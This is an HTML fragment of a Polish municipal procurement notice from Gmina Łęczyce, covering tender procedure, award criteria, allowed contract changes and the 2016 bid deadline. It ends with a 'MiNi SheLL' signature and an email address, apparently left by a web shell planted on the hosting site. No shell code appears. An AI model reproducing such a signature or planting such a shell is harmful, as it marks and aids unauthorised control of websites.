<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Okres gwarancji - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Niedopuszczalna będzie istotna zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zmiana umowy będzie dotyczyła następujących zdarzeń:
1) niesprzyjające warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych - w takim przypadku termin realizacji robót może ulec przedłużeniu o czas niezbędny na właściwe wykonanie robót
2) wykopaliska lub inne przeszkody uniemożliwiające prowadzenie robót, za które nie odpowiada Wykonawca i Zamawiający - w takim przypadku termin realizacji robót może ulec przedłużeniu o czas niezbędny na właściwe wykonanie robót
3) zawieszenia robót przez Zamawiającego wynikające z niezależnych od Wykonawcy przyczyn - w takim przypadku termin realizacji robót może ulec przedłużeniu o czas zawieszenia robót
4) wystąpienia zmian w powszechnie obowiązujących przepisach prawa, w zakresie mającym wpływ na realizację przedmiotu umowy - w takim przypadku umowa zostanie dostosowana do obowiązujących przepisów prawa bez zmiany ceny ryczałtowej
5) gdy okaże się, że z obiektywnych przyczyn (technicznych, technologicznych, ekonomicznych lub społecznych) uzasadnione będzie zastosowanie innego niż pierwotnie zaprojektowano rozwiązania - w takim przypadku dopuszcza się zmianę ustalonego rozwiązania w zakresie zastosowania materiałów lub technologii
6) wystąpienia konieczności zmian spowodowanych następującymi okolicznościami:
a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy w umownym terminie - w takim przypadku termin realizacji robót może ulec przedłużeniu o czas niezbędny na właściwe wykonanie robót
b) zmiana obowiązującej stawki podatku VAT - w takiej sytuacji cena oferty zostanie zmieniona zgodnie z obowiązującymi przepisami
7) w przypadku wystąpienia konieczności wykonania robót dodatkowych, niemożliwych do przewidzenia w chwili udzielania zamówienia, których wykonanie będzie niezbędne dla wykonania przedmiotu umowy - w takim przypadku termin realizacji robót może ulec przedłużeniu o czas niezbędny na właściwe wykonanie robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.leczyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łęczyce, ul. Długa 49, 84-218 Łęczyce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2016 godzina 09:00, miejsce: Sekretariat Urzędu Gminy Łęczyce, ul. Długa 49, 84-218 Łęczyce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com